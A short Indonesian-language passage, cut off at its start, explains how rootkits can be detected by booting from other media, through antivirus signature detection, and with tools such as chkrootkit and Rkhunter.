untuk mendeteksi ada tidaknya rootkit di computer adalah dengan mematikan
computer dan boot ulang tidak dengan harddisk melainkan dengan media lain
seperti CD-ROM atau disket USB. Rootkit yang tidak berjalan tak dapat
bersembunyi dan kebanyakan antivirus dapat mengidentifikasikannya.



Produsen perangkat keamanan biasanya
telah mengintegrasikan pendeteksi rootkit di produknya. Meskipun rootkit di
menyembunyikan diri selama proses pemindaian berjalan, antivirus masih bisa
mengenalinya. Juga bila rootkit menarik diri dari system untuk sementara,
antivirus tetap dapat menemukannya dengan menggunakan deteksi “sidik jari”
alias byte unik dari rootkit.



Rootkit memang cerdik. Dia bisa
menganalisis proses-proses yang sedang berjalan. Andai ia mencurigai suatu
proses sebagai tindak tanduk antivirus, ia bisa menyembunyikan diri. Ketika
prose situ selesai, ia aktif kembali. Ada beberapa program yang bisa dipakai
untuk mendeteksi adanya rootkit pada system. Rootkit detector kit, chkrootkit
dan Rkhunter adalah contoh yang bisa digunakan.